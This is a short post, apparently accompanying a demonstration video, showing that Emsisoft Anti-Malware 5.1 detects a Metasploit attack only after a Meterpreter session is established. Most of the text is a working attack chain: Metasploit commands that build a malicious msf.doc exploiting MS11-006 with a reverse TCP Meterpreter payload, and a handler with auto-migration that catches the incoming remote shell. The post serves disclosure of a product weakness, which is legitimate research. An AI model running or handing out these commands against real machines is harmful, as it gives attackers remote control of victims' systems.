
Metasploit Meterpreter race condition against Emsisoft Anti-Malware

This video demonstrates a race condition in the Emsisoft Anti-Malware product. The race condition is caused by design errors in the product.

We will exploit the MS11-006 vulnerability (Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow) and use a reverse TCP meterpreter payload.

As you will see, the installed “Emsisoft Anti-Malware” product detects the attack, but too late: the meterpreter session has already been created and you have access to the system. The demonstrated product is an up-to-date Emsisoft Anti-Malware (Version: 5.1.0.10 – Signatures: 5,466,115).

Metasploit commands:

To create the msf.doc file that exploits the MS11-006 vulnerability:

use exploit/windows/fileformat/ms11_006_createsizeddibsection
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

To listen for incoming meterpreter sessions:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
set InitialAutoRunScript migrate -f
exploit -j

Demonstration video: